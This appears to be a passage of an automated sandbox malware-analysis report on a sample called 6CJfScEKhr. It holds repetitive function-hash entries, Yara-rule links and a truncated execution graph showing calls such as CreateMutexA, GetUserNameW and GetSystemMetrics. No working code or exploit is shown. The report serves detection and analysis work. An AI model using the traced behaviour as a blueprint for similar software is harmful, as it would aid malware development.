                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A17830 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A14A88 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A1CAD0 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A19B18 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7D2E8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7CA74 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4a6cde5bda8ee8d6f9a718f0fa73e4265b8072e02fcdee4939ba6bd2fa45cf5
                                                                      • Instruction ID: 90b06d2f144e1e8a65575d01b34436dc04bcfe7fe09ebfdc859531763654d841
                                                                      • Opcode Fuzzy Hash: b4a6cde5bda8ee8d6f9a718f0fa73e4265b8072e02fcdee4939ba6bd2fa45cf5
                                                                      • Instruction Fuzzy Hash: A5C04C782441815FC244CA14C595855BBE1ABD9218714C99DD89987756CA32DC43DB15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7CA78 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A16AAA Relevance: .0, Instructions: 7COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e4055712a26986e1b57565381bc4f756b7b2e8fdc7b2007f4d436e6ea288550d
                                                                      • Instruction ID: 4c4b8acf703355aa7fc3b05eb0f966816154537bdd1c0d355f78e9805fa6629f
                                                                      • Opcode Fuzzy Hash: e4055712a26986e1b57565381bc4f756b7b2e8fdc7b2007f4d436e6ea288550d
                                                                      • Instruction Fuzzy Hash: D2B012352090204BD244C60CCD41815B351DBC4308318C09DB408CF705CF33EB039690
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A10450 Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                      • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A12FD0 Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                      • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A18A20 Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                      • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A16230 Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.407335520.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4a10000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                      • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D75750 Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                      • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D77D20 Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                      • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D71A80 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                      • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00D7252C Relevance: 8.5, Strings: 5, Instructions: 2266COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 9L+K$Cqt`$UQ$pl>V$z-
                                                                      • API String ID: 0-3081535762
                                                                      • Opcode ID: 77bdde4a563e977864e164f56bef9e95d22b0c032d966d79616acd1747b28a02
                                                                      • Instruction ID: 40a57d99f2dfd7574806c6d7fd17ae19f160f751a94c98aa5c594e8ce7052d7c
                                                                      • Opcode Fuzzy Hash: 77bdde4a563e977864e164f56bef9e95d22b0c032d966d79616acd1747b28a02
                                                                      • Instruction Fuzzy Hash: BD43A331D5062B8ACF119F6089546D9F372BFA6304F21DB95E9483B180EB712BDACF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7E348 Relevance: .5, Instructions: 497COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3791f1fbf47af8eb3d0559752633f23e5b6bc39ba89f90ddd74b8d6e50190d30
                                                                      • Instruction ID: 68edccd7157e1c92606345db6592580929eb7f360109c9b313cf7fb510bbf3ba
                                                                      • Opcode Fuzzy Hash: 3791f1fbf47af8eb3d0559752633f23e5b6bc39ba89f90ddd74b8d6e50190d30
                                                                      • Instruction Fuzzy Hash: 59123C71E041198FDB14CFA9C8809ADBBF6FF88310F2AC569E819EB355E635DC418B61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D7EA00 Relevance: .4, Instructions: 394COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b51c9722a7fb61e8e96953cd761aa40155d2a95cca11756e657a1fdc06be14a2
                                                                      • Instruction ID: 82951d23ff144820a3ff9de27304f3f773a683f04f968f14595b25c00ec4109f
                                                                      • Opcode Fuzzy Hash: b51c9722a7fb61e8e96953cd761aa40155d2a95cca11756e657a1fdc06be14a2
                                                                      • Instruction Fuzzy Hash: 1BE10871A002199FDB04CF99C88499EBBF7FF88310F1AC566E819EB355D635EC918B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D709AA Relevance: .2, Instructions: 172COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0a127cf94df075220cace71723c996084e1f95ad20e326a049fbe838f8fe194d
                                                                      • Instruction ID: b0125a923d78c41f38839d52cb0e79d998a5141983031eec385fd330cfaaabe9
                                                                      • Opcode Fuzzy Hash: 0a127cf94df075220cace71723c996084e1f95ad20e326a049fbe838f8fe194d
                                                                      • Instruction Fuzzy Hash: 29715D70E052048FE709EFAAE89468A7BF3EBC9304F04C43AD0149F778DB7459469B65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00D709B8 Relevance: .2, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.405502742.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d70000_6CJfScEKhr.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e365155ffe2769fc613ad49a5ca41e3f2b597decebbf8e724271d8fc56eeda97
                                                                      • Instruction ID: 8fec16b4b17a5ca0a2842ed810e141f06a61228decd62e7e9ca55d0de25ab683
                                                                      • Opcode Fuzzy Hash: e365155ffe2769fc613ad49a5ca41e3f2b597decebbf8e724271d8fc56eeda97
                                                                      • Instruction Fuzzy Hash: A6715C70E052048FE709EFAAE89068A7BF3EBC9304F05C43AD0089B778DF7459469B65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:10.5%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:14.4%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:11
                                                                      execution_graph 17997 41a684 18004 404d00 GetModuleHandleA 17997->18004 17999 41a694 18006 419108 17999->18006 18005 404d33 18004->18005 18005->17999 18007 419110 18006->18007 18280 4034e4 18007->18280 18013 419155 18289 407d24 18013->18289 18019 41917e 18020 419189 CreateMutexA 18019->18020 18021 4191a3 18020->18021 18022 419f30 18021->18022 18024 4034e4 7 API calls 18021->18024 18023 4034e4 7 API calls 18022->18023 18025 419f48 18023->18025 18033 4191b6 18024->18033 18976 403b98 18025->18976 18028 4191e4 18357 418f9c 18028->18357 18029 4034e4 7 API calls 18032 419f63 18029->18032 18035 403b98 SysFreeString 18032->18035 18033->18028 18036 403798 21 API calls 18033->18036 18648 4036cc 18033->18648 18038 419f73 18035->18038 18036->18033 18037 406c4c 33 API calls 18039 4191f7 18037->18039 18980 403508 18038->18980 18368 406810 18039->18368 18046 419219 18403 4176d8 18046->18403 18049 403508 7 API calls 18051 419f9e 18049->18051 18053 403b80 SysFreeString 18051->18053 18055 419fa9 18053->18055 18056 403508 7 API calls 18055->18056 18058 419fb9 18056->18058 18057 4176d8 21 API calls 18065 41924c 18057->18065 18059 403b80 SysFreeString 18058->18059 18060 419fc4 18059->18060 18061 403508 7 API calls 18060->18061 18062 419fd4 18061->18062 18063 403b80 SysFreeString 18062->18063 18064 419fdf 18063->18064 18067 403508 7 API calls 18064->18067 18065->18022 18486 407428 18065->18486 18069 419fef 18067->18069 18071 403b80 SysFreeString 18069->18071 18073 419ffa 18071->18073 18075 403508 7 API calls 18073->18075 18074 407428 21 API calls 18076 4192b2 18074->18076 18077 41a00a 18075->18077 18507 406ae4 18076->18507 18079 403b80 SysFreeString 18077->18079 18081 41a015 18079->18081 18082 403508 7 API calls 18081->18082 18084 41a025 18082->18084 18086 403b80 SysFreeString 18084->18086 18088 41a030 18086->18088 18087 407428 21 API calls 18089 4192e9 18087->18089 18090 403508 7 API calls 18088->18090 18091 406984 21 API calls 18089->18091 18092 41a040 18090->18092 18093 4192fa 18091->18093 18094 403b80 SysFreeString 18092->18094 18529 4080c4 18093->18529 18096 41a04b 18094->18096 18099 403508 7 API calls 18096->18099 18100 41a05b 18099->18100 18101 403b98 SysFreeString 18100->18101 18102 41a06b 18101->18102 18103 4034e4 7 API calls 18102->18103 18104 41a076 18103->18104 18106 403b98 SysFreeString 18104->18106 18105 419909 18886 417290 18105->18886 18108 41a086 18106->18108 18109 4034e4 7 API calls 18108->18109 18111 41a091 18109->18111 18113 403b98 SysFreeString 18111->18113 18115 41a0a1 18113->18115 18117 4034e4 7 API calls 18115->18117 18119 41a0ac 18117->18119 18124 403b98 SysFreeString 18119->18124 18121 40795c 26 API calls 18176 41930d 18121->18176 18126 41a0bc 18124->18126 18133 4034e4 7 API calls 18126->18133 18128 40357c 7 API calls 18128->18176 18136 41a0c7 18133->18136 18140 403b98 SysFreeString 18136->18140 18143 41a0d7 18140->18143 18148 403508 7 API calls 18143->18148 18146 419451 GetSystemMetrics GetSystemMetrics 18828 4178b4 18146->18828 18147 418688 60 API calls 18147->18176 18151 41a0e7 18148->18151 18987 404224 18151->18987 18153 40dce8 22 API calls 18153->18176 18156 41a0fa 18157 403508 7 API calls 18156->18157 18160 41a107 18157->18160 18158 407428 21 API calls 18158->18176 18159 407048 9 API calls 18226 41940e 18159->18226 18162 4034e4 7 API calls 18160->18162 18165 41a10f 18162->18165 18164 403850 21 API calls 18164->18176 18167 4034e4 7 API calls 18165->18167 18170 41a117 18167->18170 18171 403508 7 API calls 18170->18171 18172 41a124 18171->18172 18174 403508 7 API calls 18172->18174 18177 41a131 18174->18177 18176->18022 18176->18105 18176->18121 18176->18128 18176->18146 18176->18147 18176->18153 18176->18158 18176->18164 18176->18226 18627 40d7f0 18176->18627 18651 4053d8 18176->18651 18655 414028 18176->18655 18664 408120 18176->18664 18667 405528 18176->18667 18672 414098 18176->18672 18675 415ea8 18176->18675 18684 4050c8 18176->18684 18692 414cb8 18176->18692 18796 414f40 18176->18796 18839 406fdc 18176->18839 18179 4034e4 7 API calls 18177->18179 18181 41a139 18179->18181 18273 4033f4 18181->18273 18182 4037dc 21 API calls 18182->18226 18188 414408 47 API calls 18188->18176 18190 4070bc 8 API calls 18190->18226 18194 4034e4 7 API calls 18194->18226 18196 403850 21 API calls 18196->18226 18226->18159 18226->18182 18226->18188 18226->18190 18226->18194 18226->18196 18230 414408 47 API calls 18226->18230 18712 414408 18226->18712 18845 403c98 18226->18845 18861 403d58 18226->18861 18867 40781c 18226->18867 18230->18176 18274 40340d 18273->18274 18276 403436 18274->18276 22361 403368 18274->22361 18277 403478 FreeLibrary 18276->18277 18278 40349c ExitProcess 18276->18278 18277->18276 18281 403505 18280->18281 18282 4034ea 18280->18282 18284 40357c 18281->18284 18282->18281 19012 402550 18282->19012 18285 403580 18284->18285 18286 4035a4 18285->18286 18287 402550 7 API calls 18285->18287 18288 40561c 63 API calls 18286->18288 18287->18286 18288->18013 19026 403538 18289->19026 18293 407d3d 18294 407d4d 18293->18294 18295 403538 21 API calls 18293->18295 18296 407b78 2 API calls 18294->18296 18295->18294 18297 407d57 18296->18297 18298 407d67 18297->18298 18299 403538 21 API calls 18297->18299 18300 407b78 2 API calls 18298->18300 18299->18298 18302 407d71 18300->18302 18301 407d81 19037 407c58 18301->19037 18302->18301 18303 403538 21 API calls 18302->18303 18303->18301 18305 407d86 18306 407d96 18305->18306 18307 403538 21 API calls 18305->18307 18308 406c4c 18306->18308 18307->18306 18309 406c54 18308->18309 18309->18309 18310 406c76 18309->18310 18311 406c88 18309->18311 18313 403538 21 API calls 18310->18313 19164 406e70 18311->19164 18314 406c83 18313->18314 18316 403508 7 API calls 18314->18316 18315 406c90 19169 406bb4 18315->19169 18318 406d78 18316->18318 18320 403b98 SysFreeString 18318->18320 18319 406ca3 19172 4065cc GetUserNameW 18319->19172 18321 406d85 18320->18321 18322 403508 7 API calls 18321->18322 18324 406d92 18322->18324 18343 403798 18324->18343 18325 406cb6 19178 406610 18325->19178 18327 406cc9 19185 406258 18327->19185 18330 406258 21 API calls 18331 406cf2 18330->18331 18332 406258 21 API calls 18331->18332 18333 406d05 18332->18333 18334 406258 21 API calls 18333->18334 18335 406d18 18334->18335 18336 403850 21 API calls 18335->18336 18337 406d39 18336->18337 18338 406258 21 API calls 18337->18338 18339 406d44 18338->18339 18340 403850 21 API calls 18339->18340 18341 406d54 18340->18341 18342 403538 21 API calls 18341->18342 18342->18314 18344 4037db 18343->18344 18345 40379c 18343->18345 18344->18019 18346 4037a6 18345->18346 18347 403538 18345->18347 18348 4037d0 18346->18348 18349 4037b9 18346->18349 18353 4035a8 21 API calls 18347->18353 18354 40354c 18347->18354 18351 403ac0 21 API calls 18348->18351 19248 403ac0 18349->19248 18350 40357a 18350->18019 18356 4037be 18351->18356 18353->18354 18354->18350 18355 402550 7 API calls 18354->18355 18355->18350 18356->18019 18358 418fb5 18357->18358 18359 4034e4 7 API calls 18358->18359 18366 418fd0 18359->18366 18360 4190d9 18361 4034e4 7 API calls 18360->18361 18362 4190ee 18361->18362 18363 4034e4 7 API calls 18362->18363 18364 4190f6 18363->18364 18364->18037 18365 4036cc 21 API calls 18365->18366 18366->18360 18366->18365 18367 403798 21 API calls 18366->18367 18367->18366 18369 406829 18368->18369 18370 4034e4 7 API calls 18369->18370 18376 40683e 18370->18376 18371 4068ae 18372 403508 7 API calls 18371->18372 18373 4068c8 18372->18373 18375 4034e4 7 API calls 18373->18375 18374 4036cc 21 API calls 18374->18376 18378 4068d0 18375->18378 18376->18371 18376->18374 18377 4067e8 21 API calls 18376->18377 18379 403798 21 API calls 18376->18379 18380 403850 21 API calls 18376->18380 18377->18376 18381 4037dc 18378->18381 18379->18376 18380->18376 18382 4037e0 18381->18382 18389 403798 18381->18389 18383 403538 18382->18383 18386 4037f0 18382->18386 18387 4037fe 18382->18387 18382->18389 18384 40354c 18383->18384 18390 4035a8 21 API calls 18383->18390 18385 40357a 18384->18385 18394 402550 7 API calls 18384->18394 18385->18046 18391 403538 21 API calls 18386->18391 18392 4035a8 21 API calls 18387->18392 18388 4037db 18388->18046 18389->18383 18389->18388 18393 4037a6 18389->18393 18390->18384 18391->18389 18399 403811 18392->18399 18395 4037d0 18393->18395 18396 4037b9 18393->18396 18394->18385 18397 403ac0 21 API calls 18395->18397 18398 403ac0 21 API calls 18396->18398 18401 4037be 18397->18401 18398->18401 18400 403538 21 API calls 18399->18400 18402 40383d 18400->18402 18401->18046 18402->18046 18408 4176f1 18403->18408 18404 417759 18405 4034e4 7 API calls 18404->18405 18407 41776e 18405->18407 18409 418688 18407->18409 18408->18404 19254 4039e8 18408->19254 18410 418691 18409->18410 18411 4186e7 18410->18411 18412 40357c 7 API calls 18410->18412 18413 4034e4 7 API calls 18411->18413 18412->18411 18414 4186ef 18413->18414 18415 